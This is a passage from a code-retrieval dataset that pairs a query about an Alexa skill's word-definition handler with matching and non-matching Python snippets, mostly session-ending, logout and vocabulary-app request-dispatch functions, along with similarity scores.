print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def logout_callback(item):\n yctx.session_end()", "def on_session_closed(self):\n self.session = None", "def endSession(self):\n if(self.verb >= DLS_VERB_HIGH):\n print \"--Ending session with %s (no action)\" % (self.server)", "def on_session_ended(event, session_ended_request, session):\n logger.info(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here?", "def on_session_ended(event_request, session):\n print(\"=====on_session_ended requestId=\" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return play_end_message()", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] + \", sessionId=\" + session['sessionId'])\n \n # Todo: add cleanup logic here", "def sessionEnded(self):\r\n if self.sessionStarted == True: \r\n self.sessionCompleted = True", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])", "def handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying Cuni Control. \" \\\n \"Have a nice day! \"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))", "def on_session_destroyed(session_context):\n if data.AUTO_SHUTDOWN:\n import sys\n\n sys.exit(\n \"\\033[1;31mThe session has ended - tab closed or timeout. \\n\\n --- Terminating the Forest progam and relinquishing control of port. ---\\033[1;00m\"\n )", "def end_session(request):\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n del request.session[\"analytics\"]\n\n response = {\n \"redirect_url\": \"/main\"\n }\n\n return JsonResponse(response)", "def on_session_closed(self, session):\n if session.id in self.sessions:\n del self.sessions[session.id]", "def session_end(self, user):\n self._transport.delete(\"/service/v3/sessions\", self._subject, username=user)", "def on_timeout(self):\n self.logger.debug('id=%d, Session timed out!', self.id)\n self.close(SessionCloseErrorCode.SESSION_DIED)", "def close_session(self):\n if self.sma_sid is None:\n return\n yield from self._fetch_json(URL_LOGOUT, {})\n self.sma_sid = None", "def _handle_logout(self):\n self.food_service.log_out()\n self._handle_after_logout()", "def handle_session_end_request():\n speech_output = None\n response = response_builders.build_response(session_attributes,\n response_builders.build_speechlet_response(card_title,\n speech_output, reprompt_text, should_end_session))\n return response", "def on_exit(session):\n session.close()", "def session_ended_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n\n speech_text = \"The session ended.\"\n handler_input.response_builder.speak(speech_text)\n\n logger.info(\n \"Session ended with reason: {}\".format(\n handler_input.request_envelope.request.reason))\n return handler_input.response_builder.response", "def close_session(self, message):\n pass", "def process_logout():\n\n print \" LOGGED OUT USER \"\n\n del session[\"user_id\"]\n\n flash(\"You have Successfully Logged Out!\")\n\n return redirect(\"/\")", "def process_logout():\n\n print \" LOGGED OUT USER \"\n\n del session[\"user_id\"]\n\n flash(\"You have Successfully Logged Out!\")\n\n return redirect(\"/\")", "def set_end_session(self, end):\n self.response.shouldEndSession = end", "def default_after_end_session_hook(\n request, id_token=None, post_logout_redirect_uri=None,\n state=None, client=None, next_page=None):\n return None", "def session_ended(self, f):\n self._session_ended_view_func = f\n\n return f", "def _handleSessionStopped(self, data):\r\n print(\"\\\"Session stopped\\\" received\")\r\n self.whitebeet.v2gParseSessionStopped(data)\r\n self.charger.stop()", "async def async_close_session(self) -> None:\n if not self.token:\n return\n\n await self._async_ws_set_function(CMD_LOGOUT, {})\n self.token = None", "def terminate_session():\n token = oidc.user_loggedin and oidc.get_access_token()\n if token and oidc.validate_token(token):\n # Direct POST to Keycloak necessary to clear KC domain browser cookie\n logout_uri = oidc.client_secrets['userinfo_uri'].replace(\n 'userinfo', 'logout')\n data = {\n 'client_id': oidc.client_secrets['client_id'],\n 'client_secret': oidc.client_secrets['client_secret'],\n 'refresh_token': oidc.get_refresh_token()}\n requests.post(logout_uri, auth=BearerAuth(token), data=data)\n\n oidc.logout() # clears local cookie only", "def end_session(self):\r\n self.web_driver.quit()\r\n self.write_log(\"Web driver ended.\")", "def logout(self):\n try:\n log.info(\"Logging out of the netscaler\")\n self.post(\"/logout\", {\"logout\": {}})\n except BadNetScaler as error:\n log.error(\"Failed to logout of the netscaler: %s\", error)\n self.sessionid = \"\"", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r\n global current_x\r\n global current_y\r\n global prev_x\r\n global prev_y\r\n current_x = 0\r\n current_y = 0\r\n prev_x = 0\r\n prev_y = 0", "def on_connection_close(self, *args, **kwargs):\n print \"CONNECTION CLOSED!!!!\"\n self.p.terminate()\n tornado.web.RequestHandler.on_connection_close(self, *args, **kwargs)", "def close(self):\n self.session.close(SessionCloseErrorCode.SESSION_DIED)", "def stop_cb(evt: speechsdk.SessionEventArgs):\n print('CLOSING on {}'.format(evt))\n nonlocal done\n done = True", "def close(self):\n\n if self.closed:\n return\n\n url = '{0}://{1}/admin/launch?script=rh&template=logout&action=logout'\n\n try:\n resp = self._handle.open(url.format(self.proto, self.host))\n pg = resp.read()\n if 'You have been successfully logged out.' not in pg:\n self.log('Failed logout, somehow:\\n{0}'.format(pg))\n else:\n self._closed = True\n except (urllib2.HTTPError, urllib2.URLError) as e:\n self.log('{0}: {1}'.format(e.__class__.__name__, e))", "def end_session(self, session_id):\n params = {\n 'ident': session_id,\n 'sessionclosed': 1 # Requests a session to be closed\n }\n response = urllib2.urlopen(\n self.endpoint, urllib.urlencode(params)).read()\n\n return response == ''", "def logout(self):\n self.session.disconnect()", "def at_server_shutdown(self):\n for session in self.sessions.all():\n session.sessionhandler.disconnect(session)", "def shutdown_session(response):\n db_session.remove()\n return response", "def shutdown_session(response):\n db_session.remove()\n return response", "def end(self, send_logout_to_apis=False, request=None):\n self.ended_at = now()\n self.save()\n\n if send_logout_to_apis and request:\n from oidc_apis.backchannel_logout import send_backchannel_logout_to_apis_in_token_scope\n\n tokens = [se.content_object for se in self.get_elements_by_model(Token)]\n for token in filter(None, tokens):\n send_backchannel_logout_to_apis_in_token_scope(token, request, sid=str(self.id))", "def on_close(self):\n\n if self.id in self.funcserver.websocks:\n self.funcserver.websocks[self.id] = None\n ioloop = tornado.ioloop.IOLoop.instance()\n ioloop.add_callback(lambda: self.funcserver.websocks.pop(self.id, None))\n\n psession = self.funcserver.pysessions.get(self.pysession_id, None)\n if psession:\n psession[\"socks\"].remove(self.id)\n if not psession[\"socks\"]:\n del self.funcserver.pysessions[self.pysession_id]", "def handle_finish_session_request(intent, session):\n \n print(\"handle_finish_session_request\", intent)\n\n return response(speech_response=\"Danke fürs mitspielen!\", should_end_session=True,\n card_text=ABSCHIED_CARD_TEXT)", "def stop(self):\n return self.rpc.call(MsfRpcMethod.SessionStop, [self.sid])", "def session_shutdown(self, session):\n self.remove_session(session)", "def logout(self):\n url = \"https://%s/game/index.php?page=logout\" % self.server\n #\"https://s103-pt.ogame.gameforge.com/game/index.php?page=logout\"\n self.session.get(url)", "def endMessage(self):", "def rstrtmgr_RmEndSession(jitter):\n ret_ad, args = jitter.func_args_stdcall([\"dwSessionHandle\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def handle_close(self):\n self.clear()\n LOGGER.debug(\"local session closed(%d)\", id(self))\n MOLO_CLIENT_APP.remote_session_dict.pop(id(self), None)\n remote_session = MOLO_CLIENT_APP.remote_session_dict.get(id(self))\n if remote_session:\n remote_session.handle_close()\n self.close()", "def logout(self):\n spotify.Error.maybe_raise(lib.sp_session_logout(self._sp_session))", "def user_logged_out(self, sender, request, user, **kwargs):", "def sendSslEnd(self, req):\n self._sendTcpMessage(self.SONY_MSG_Tcp_ProxyEnd, req, self.ThreeValueMsg.pack(a=1, b=1, c=0))", "def end_request(self, environ):\n pass", "def close(self):\n self.sess.close()\n print(\"Current session closed!\")", "def handle_close(self):\n LOGGER.debug(\"server closed(%d)\", id(self))\n self.clear()\n MOLO_CLIENT_APP.local_session_dict.pop(id(self), None)\n local_session = MOLO_CLIENT_APP.local_session_dict.get(id(self))\n if local_session:\n local_session.handle_close()\n self.close()", "def logout(self):\n pass", "def __end_session(session):\n\n # reset agent and game recording info\n session['recording'] = False\n # gather time information and compile stats\n session['endTime'] = time.time()\n\n output_logs(session)\n\n stats = compile_stats(session)\n\n return stats", "def logout(self):\n data = {'action': 'logout'}\n self.call(data)\n self._high_limits = None\n return True", "def test_dispatch_session_end(self):\n @self.skill.session_ended\n def sample_func():\n \"\"\"Decorated function.\"\"\"\n self.skill.response.sessionAttributes['run'] = True\n self.skill.request.request.type = 'SessionEndedRequest'\n self.skill.dispatch()\n self.assertTrue(self.skill.response.sessionAttributes['run'])", "def logout(session):\r\n response = session.get(LOGOUT_URL)\r\n response.raise_for_status()", "def close(self, code=3000, message='Go away!'):\n if self.state != CLOSED:\n try:\n self.conn.on_close()\n except:\n LOG.debug(\"Failed to call on_close().\", exc_info=True)\n finally:\n self.state = CLOSED\n self.close_reason = (code, message)\n self.conn = None\n\n # Bump stats\n self.stats.on_sess_closed(self.transport_name)\n\n # If we have active handler, notify that session was closed\n if self.handler is not None:\n self.handler.session_closed()", "def ldap_logout():\n timed_out = request.args.get('timed_out', False)\n logout_user()\n create_auth_event(\n auth_event_type=event_type.USER_FAILED_LOG_IN,\n user_guid=session[\"user_id\"],\n new_value={\n 'success': True,\n 'type': current_app.config['AUTH_TYPE'],\n 'timed_out': timed_out\n }\n )\n session.clear()\n if timed_out:\n flash(\"Your session timed out. Please login again\", category=\"info\")\n return redirect(url_for(\"main.index\"))", "def on_end(self, ctx):\n pass", "def do_logout():\n del session[CURRENT_USER_KEY]" ]
[ "0.7643362", "0.76416", "0.7545587", "0.7457293", "0.7457293", "0.7399156", "0.72849315", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72389835", "0.72389835", "0.72389835", "0.72389835", "0.72389835", "0.7209444", "0.71777976", "0.7160291", "0.7089481", "0.70823884", "0.70736307", "0.7033392", "0.7005722", "0.6969514", "0.69112545", "0.6908785", "0.6762447", "0.67195565", "0.6715968", "0.6626428", "0.6589876", "0.6552739", "0.65475017", "0.65180784", "0.6497212", "0.64951265", "0.64784056", "0.64784056", "0.6443537", "0.64229184", "0.6401545", "0.63840926", "0.6341352", "0.6215513", "0.62070245", "0.6206105", "0.6202281", "0.61723554", "0.61644644", "0.6128591", "0.61243105", "0.6123884", "0.61194223", "0.6118473", "0.61147594", "0.61147594", "0.6112565", "0.60985607", "0.6097556", "0.6097463", "0.60840464", "0.60735977", "0.60726", "0.60507965", "0.6036347", "0.603521", "0.60018873", "0.5995472", "0.59916806", "0.59837323", "0.59507865", "0.59489524", "0.59414923", "0.5938073", "0.5934755", "0.5920715", "0.59019816", "0.5896067", "0.5892325", "0.5886072" ]
0.0
-1
Check if word is provided in slot values. Send word to URLbuilder and return JSON data. Give user definition information.
def my_word_definition_handler(handler_input): # type: (HandlerInput) -> Response slots = handler_input.request_envelope.request.intent.slots if word_slot in slots: curr_word = slots[word_slot].value handler_input.attributes_manager.session_attributes[ word_slot_key] = curr_word try: response = http_get(curr_word, False) if response: speech = ("The definition of {} with part of speech {} " "is: {}".format(curr_word, response[0]['fl'], response[0]['shortdef'][0])) reprompt = ("What word would you like me to look up?") else: speech = ("I am sorry I could not find the word {}").format(curr_word) reprompt = ("What word would you like me to look up?") except: speech = ("I am sorry I could not find the word {}. " "Can I look up another word?").format(curr_word) reprompt = ("What word would you like me to look up?") else: speech = "I'm not sure what word to look up, please try again" reprompt = ("I didn't catch that. What word would you like me " "me to look up?") handler_input.attributes_manager.session_attributes[previous_key] = speech handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def my_word_example_handler(handler_input):\n # type: (HandlerInput) -> Response\n slots = handler_input.request_envelope.request.intent.slots\n\n if example_slot in slots:\n curr_word = slots[example_slot].value\n handler_input.attributes_manager.session_attributes[\n example_slot_key] = curr_word\n\n try:\n response = http_get(curr_word, False)\n\n if response:\n example = response[0]['def'][0]['sseq'][0][0][1]['dt'][1][0]\n if example == \"vis\":\n vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][1][1][0]['t'])\n speech = (\"An example with {} (part of speech {}) \"\n \"is: {}\".format(curr_word, response[0]['fl'],\n vis))\n elif example == \"wsgram\":\n vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][2][1][0]['t'])\n speech = (\"An example with {} (part of speech {}) \"\n \"is: {}\".format(curr_word, response[0]['fl'],\n vis))\n else:\n speech = (\"No example is available for {}\").format(curr_word)\n reprompt = (\"What word would you like me to look up?\")\n else:\n speech = (\"No example is available for {}\").format(curr_word)\n reprompt = (\"What word would you like me to look up?\")\n except Exception as e:\n speech = (\"No example is available for {}. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like me to look up?\")\n else:\n speech = \"I'm not sure what word to look up, please try again\"\n reprompt = (\"I didn't catch that. What word would you like me \"\n \"me to look up?\")\n\n handler_input.attributes_manager.session_attributes[previous_key] = speech\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def my_word_example_handler(handler_input):\n # type: (HandlerInput) -> Response\n slots = handler_input.request_envelope.request.intent.slots\n\n if synonym_slot in slots:\n curr_word = slots[synonym_slot].value\n handler_input.attributes_manager.session_attributes[\n synonym_slot_key] = curr_word\n\n try:\n synonyms = http_get(curr_word, True)\n\n if type(synonyms[0]) == dict:\n speech = (\"A synonym for {} is {}\".format(curr_word,\n synonyms[0]['meta']['syns'][0][0]))\n synonym_list = synonyms[0]['meta']['syns'][0]\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n except:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = \"I'm not sure what word to find a synonym for, please try again\"\n reprompt = (\"I didn't catch that. What word would you like me \"\n \"me to look up a synonym for?\")\n\n handler_input.attributes_manager.session_attributes[previous_key] = speech\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def score_word():\n data = request.json\n user_word = data['word'].upper()\n game_id = data['game_id']\n current_game = games[game_id]\n\n print(\"checking word\", games)\n \n if not current_game.is_word_in_word_list(user_word): # true/false\n result = \"not-word\"\n elif not current_game.check_word_on_board(user_word): # true/false\n result = \"not-on-board\"\n else:\n result = \"ok\"\n \n\n return jsonify(result=result)", "def guess():\n word = request.args[\"word\"]\n board = session[\"board\"]\n\n # create response by the response of the function if word is valid\n response = boggle_game.check_valid_word(board, word)\n\n return jsonify({'result': response})", "def lookup_word(word):\n\n return API.get_response(word)", "def validate_word(word: str) -> bool:\n if word:\n url = f'{OXFORD_DICT_BASE_URL}{OXFORD_DICT_ENTRY_URL}/en-us/{word.lower()}'\n headers = {\n 'app_id': settings.OXFORD_APP_ID,\n 'app_key': settings.OXFORD_API_KEY,\n }\n\n logger.info(f'validating {word} against oxford dictionary...')\n response = requests.get(\n url,\n headers=headers,\n )\n\n if response.status_code == status.HTTP_200_OK:\n return True\n else:\n return False\n\n return False", "def __call__(self, word):\n return self.parse_request(self.request(f\"https://www.dictionaryapi.com/api/v3/references/collegiate/json/{word}?key={self.apikey}\"), word)", "def definition(request, word_to_lookup):\n return render(request, 'definition.html')", "def search_word(word : str = typer.Argument(..., help=\"Searches the trie if the word exists\")):\n response_url = url + \"/search/\" + word\n response = requests.get(response_url)\n typer.echo(response.json()[\"status\"])", "def wordInfo(self, input_word):\n return self.app.get('/words/1.0/info/' + input_word, follow_redirects=True, headers=self.headers)", "def get_response(self, word: str):\n lkup = self.get_lookup_segments(word)\n lkup_url = self.url + lkup\n\n res = requests.request(\"GET\", lkup_url, headers=self.headers)\n\n if res.status_code == 200:\n return res.json()['definitions']\n else:\n raise NetworkError()", "def add_word(word : str = typer.Argument(..., help=\"Adds a word into the trie\")):\n response_url = url + \"/add-word/\" + word\n response = requests.post(response_url)\n # typer.echo(response.status_code)\n typer.echo(response.json()[\"status\"])", "def distribute_actions(jo):\n\n # check if valid session\n\n # check login\n\n log.log_info(\"in distribute_actions\")\n\n rj = {}\n result = \"\"\n \n action = jo[\"action\"]\n\n log.log_info(\"action is: \" + str(action))\n\n if action == \"addOneWord\":\n\n session = jo[\"session\"]\n\n elif action == \"addText\": # todo: is this anywhere used ???\n\n text = jo[\"text\"]\n language = jo[\"language\"] # the input language\n\n elif action == \"adVocFromUrl\":\n\n log.log_info(\"in distribute_actions adVocFromUrl\")\n\n session = jo[\"session\"]\n user_id = dbs.get_user_id_from_session(session)\n\n time_stamp = int(time.time())\n\n dbac.add_one_word_txt(user_id, jo[\"language\"], jo[\"word\"], jo[\"translationLanguage\"], jo[\"translationWord\"], True, \"\", \"\", time_stamp)\n dbac.add_one_word_txt(user_id, jo[\"translationLanguage\"], jo[\"translationWord\"], jo[\"language\"], jo[\"word\"], False, \"\", \"\", time_stamp)\n\n# now test if it arrived\n log.log_info(\"in distribute_actions preparing response\")\n \n rj['action'] = \"adVocFromUrl\"\n rj['result'] = \"successfully inserted \"\n \n result = json.dumps(rj)\n\n elif action == \"loadWord\": # ATTENTION !!! this is probably not used anymore !!!\n\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\"===============================================================================\")\n log.log_logic(\"=========================== ROUTE loadWord ====================================\")\n log.log_logic(\"===============================================================================\")\n\n log.log_info(\"loading new word\")\n log.log_info(jo)\n\n wordId = jo[\"wordId\"]\n answer = jo[\"answer\"]\n session = jo[\"session\"]\n\n log.log_info(\"answer was \" + answer)\n log.log_info(\"wordId was \" + str(wordId))\n log.log_info(\"session was \" + str(session))\n\n user_id = dbs.get_user_id_from_session(session)\n\n log.log_info(\"user_id is \" + str(user_id))\n\n success, experiment, once_learned = dbl.process_answer(str(wordId), user_id, answer)\n\n log.log_info(\"process_answer done -------------------------------\")\n\n new_id = dbl.get_next_word_id(user_id, str(wordId))\n\n log.log_info(\"get_next_word_id done\")\n\n id, l1, w1, l2, w2 = dbl.get_word(new_id)\n\n #get a random word from the words already learned\n learned_id = dbl.get_learned_random(user_id)\n rnd_id, rnd_l1, rnd_w1, rnd_l2, rnd_w2 = dbl.get_word(learned_id)\n\n rj['action'] = action\n rj[\"wordId\"] = id\n rj[\"language1\"] = dbac.get_language_label(l1)\n rj[\"word1\"] = w1\n rj[\"language2\"] = dbac.get_language_label(l2)\n rj[\"word2\"] = w2\n rj['error'] = False\n rj['error_description'] = \"\"\n rj['success'] = success\n rj['experiment'] = experiment\n rj['once_learned'] = once_learned\n\n rj[\"rnd_wordId\"] = rnd_id\n rj[\"rnd_language1\"] = dbac.get_language_label(rnd_l1)\n rj[\"rnd_word1\"] = rnd_w1\n rj[\"rnd_language2\"] = dbac.get_language_label(rnd_l2)\n rj[\"rnd_word2\"] = rnd_w2\n rj[\"rnd_frequency\"] = 15 #todo: convert to algorithm depending on % learned and size of vocabulary\n\n\n result = json.dumps(rj)\n\n log.log_info(\"distribute_actions(jo) result for new word \" + result)\n\n elif action == \"loadWordArray\":\n\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\" \")\n log.log_logic(\"===============================================================================\")\n log.log_logic(\"=========================== ROUTE loadWordArray ====================================\")\n log.log_logic(\"===============================================================================\")\n\n log.log_info(\"loading new word array\")\n log.log_info(jo)\n\n wordId = jo[\"wordId\"]\n answer = jo[\"answer\"]\n session = jo[\"session\"]\n\n log.log_info(\"answer was \" + answer)\n log.log_info(\"wordId was \" + str(wordId))\n log.log_info(\"session was \" + str(session))\n\n if len(str(wordId).strip()) > 0:\n\n xxxx, yyyy, w1, zzzz, w2 = dbl.get_word(wordId)\n\n log.log_logic(\"answer was \" + answer)\n log.log_logic(\"wordId was \" + str(wordId))\n log.log_logic(\"w1 was \" + str(w1))\n log.log_logic(\"w2 was \" + str(w2))\n\n user_id = dbs.get_user_id_from_session(session)\n\n log.log_info(\"user_id is \" + str(user_id))\n\n # January 2019 we change this logic now using a ordered list avoiding random\n #success, experiment, once_learned = dbl.process_answer(str(wordId), user_id, answer)\n success, experiment, once_learned = dbl.process_answer_with_sorted_array(str(wordId), user_id, answer)\n\n log.log_logic(\"was experiment? \" + str(experiment))\n log.log_logic(\"was success? \" + str(success))\n log.log_logic(\"once learned? \" + str(once_learned))\n log.log_logic(\"***** processing uf user answer done, now prepare response *****\")\n\n # January 2019 trying out a new algorithm using a logic that does not use random, but ordered by logic\n #new_id_array = dbl.get_next_word_id_array(user_id, str(wordId))\n\n new_id_array = dbl.get_next_word_id_array_ordered_position(user_id, str(wordId))\n\n word_arr = []\n # ToDo: this is here very inefficient code that creates a lot of traffic on database. Integrate in previous function call\n for new_id in new_id_array:\n\n row_j = {}\n id, l1, w1, l2, w2 = dbl.get_word(new_id[0])\n row_j[\"wordId\"] = id\n row_j[\"language1\"] = dbac.get_language_label(l1)\n row_j[\"word1\"] = w1\n row_j[\"language2\"] = dbac.get_language_label(l2)\n row_j[\"word2\"] = w2\n row_j[\"position\"] = new_id[1]\n\n log_str = str(row_j[\"wordId\"]) + \", \"\n log_str += str(row_j[\"position\"]) + \", \"\n log_str += str(row_j[\"word1\"]) + \", \"\n log_str += str(row_j[\"word2\"]) + \", \"\n\n log.log_logic(log_str)\n\n word_arr.append(row_j)\n\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n rj['success'] = success\n rj['bucket-sizes'] = 3\n rj['bucket-distribution'] = [0.6, 0.9]\n rj['experiment'] = experiment\n rj['once_learned'] = once_learned\n rj[\"words\"] = word_arr\n\n log.log_logic(\"sending to client success = \" + str(success))\n log.log_logic(\"sending to client experiment = \" + str(experiment))\n\n # get a random word from the words already learned\n # this is to repeat words and to create a better training set\n learned_id = dbl.get_learned_random(user_id)\n rnd_id, rnd_l1, rnd_w1, rnd_l2, rnd_w2 = dbl.get_word(learned_id)\n\n rj[\"rnd_wordId\"] = rnd_id\n rj[\"rnd_language1\"] = dbac.get_language_label(rnd_l1)\n rj[\"rnd_word1\"] = rnd_w1\n rj[\"rnd_language2\"] = dbac.get_language_label(rnd_l2)\n rj[\"rnd_word2\"] = rnd_w2\n rj[\"rnd_frequency\"] = 10 #todo: convert to algorithm depending on % learned and size of vocabulary\n\n log.log_logic(\"sending to client extra random word: \" + rnd_w1 + \" == \" + rnd_w2)\n\n result = json.dumps(rj)\n\n log.log_info(\"distribute_actions(jo) result for new word \" + result)\n\n elif action == \"editWord\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n\n fromWord = jo[\"fromWord\"]\n toWord = jo[\"toWord\"]\n word_id = jo[\"wordId\"]\n\n dbc.update_word_by_id(user_id, fromWord, toWord, word_id)\n\n log.log_info(\"update word done\")\n\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n\n result = json.dumps(rj)\n\n elif action == \"report\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n\n new_words, learned_words, ratio_learned = dbr.get_simple_report(user_id)\n c1, c2, c3, c4 = dbr.get_report_charts(user_id)\n\n log.log_info(\"c1 = \" + str(c1))\n log.log_info(\"c2 = \" + str(c2))\n log.log_info(\"c3 = \" + str(c3))\n log.log_info(\"c4 = \" + str(c4))\n\n log.log_info(\"done getting data for charts\")\n\n rj['action'] = action\n rj['newWords'] = new_words\n rj['learnedWords'] = learned_words\n rj['ratioLearned'] = ratio_learned\n rj['c1'] = c1\n rj['c2'] = c2\n rj['c3'] = c3\n rj['c4'] = c4\n rj['html'] = \"\"\n rj['error'] = False\n rj['error_description'] = \"\"\n\n log.log_info(\"converting to json\")\n\n try:\n result = json.dumps(rj)\n except Exception as ex:\n log.log_error(\"error in making report: \" + str(ex))\n rj = {}\n rj['action'] = action\n rj['error'] = True\n rj['error_description'] = \"error in making report: \" + str(ex)\n result = json.dumps(rj)\n\n log.log_info(\"distribute_actions(jo) result for report = \" + result)\n\n elif action == \"readerSaveText\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n # user_id, language, url, text\n rj['text_id'], err = db_reader.save_text(user_id, jo[\"language\"], jo[\"url\"], jo[\"text\"])\n rj['action'] = action\n if len(err) > 0:\n rj['error'] = True\n rj['error_description'] = err\n else:\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"readerLoadTextTitles\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n rj['titles'] = db_reader.get_text_titles(user_id)\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"readerLoadOneText\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n rj['text'], rj['text_id'] = db_reader.get_one_text(jo[\"id\"], user_id)\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"readerSetTextRead\":\n\n session = jo[\"session\"]\n log.log_info(\"session was \" + str(session))\n user_id = dbs.get_user_id_from_session(session)\n db_reader.set_text_read(jo[\"id\"], user_id)\n rj['action'] = action\n rj['error'] = False\n rj['error_description'] = \"\"\n result = json.dumps(rj)\n\n elif action == \"logIn\":\n\n # login and create session\n user = jo[\"user\"].strip()\n password = jo[\"password\"].strip()\n rj['action'] = \"logIn\"\n\n password = password.strip()\n password = password.replace(\" \", \"\")\n\n user = user.lower()\n user = user.strip()\n user = user.replace(\" \", \"\")\n\n if dbs.check_login(user, password) > 0:\n rj['success'] = True\n rj['result'] = \"success\"\n rj['session'] = dbs.make_save_session(user)\n\n # we need to register the session in the MASTER's database\n register_user_and_session_at_master(rj['session'], user)\n\n\n else:\n rj['success'] = False\n rj['result'] = \"failure\"\n rj['session'] = \"\"\n\n log.log_info(\"result - \" + str(rj))\n result = json.dumps(rj)\n\n elif action == \"logout\":\n\n # ToDo\n # logfiles out by destroying session and or cookie?\n\n session = jo[\"session\"]\n\n elif action == \"checkSession\":\n\n # check if session is valid\n session = jo[\"session\"]\n rj['action'] = \"checkSession\"\n\n if dbs.check_session(session) > 0:\n log.log_info(\"valid session \" + session)\n rj['sessionValid'] = True\n else:\n log.log_info(\"invalid session \" + session)\n rj['sessionValid'] = False\n\n result = json.dumps(rj)\n\n elif action == \"getLanguages\":\n\n rj['action'] = action\n\n rj['labels'] = [\"English\", \"German\", \"Russian\", \"Franch\", \"Italian\", \"Spanish\", \"Portuguese\"]\n rj['values'] = [\"english\", \"german\", \"russian\", \"franch\", \"italian\", \"spanish\", \"portuguese\"]\n\n rj['error'] = False\n rj['error_description'] = \"\"\n\n result = json.dumps(rj)\n\n elif action == \"resetPassword\":\n\n rj['action'] = action\n\n # ToDo\n # reset password and send new password to user by email\n\n user = jo[\"user\"]\n user = user.lower()\n user = user.strip()\n user = user.replace(\" \", \"\")\n\n if dbs.check_user(user) > 0:\n p = dbs.random_string_simple(6)\n dbs.update_password(user, p)\n # ToDo: put in a separate thread to prevent slow down of process\n # ToDo: make nice test in mail\n email_sender.send_mail(user, \"resetPassword\", \"Password: \" + p)\n rj['result'] = \"success\"\n rj['success'] = True\n log.log_info(\"success in resetting password for \" + user)\n else:\n rj['result'] = \"failure\"\n rj['success'] = False\n log.log_info(\"failure in resetting password because user not existing \" + user)\n\n result = json.dumps(rj)\n\n elif action == \"registerUser\":\n\n rj['action'] = action\n\n # ToDo\n # reset password and send new password to user by email\n\n user = jo[\"user\"]\n user = user.lower()\n user = user.strip()\n user = user.replace(\" \", \"\")\n\n if dbs.check_user(user) < 1:\n\n p = dbs.random_string_simple(4)\n dbs.register_user(user, p)\n\n # ToDo: put in a separate thread to prevent slow down of process\n # ToDo: make nice test in mail\n email_sender.send_mail(user, \"registerUser\", \"password: \" + p)\n\n # wwe need to inform the MASTER about the registration.\n register_user_and_session_at_master(\"\", user)\n\n log.log_info(\"registering user \" + user)\n\n rj['result'] = \"success\"\n rj['success'] = True\n else:\n\n log.log_info(\"user already exists: \" + user)\n\n rj['result'] = \"failure\"\n rj['success'] = False\n\n result = 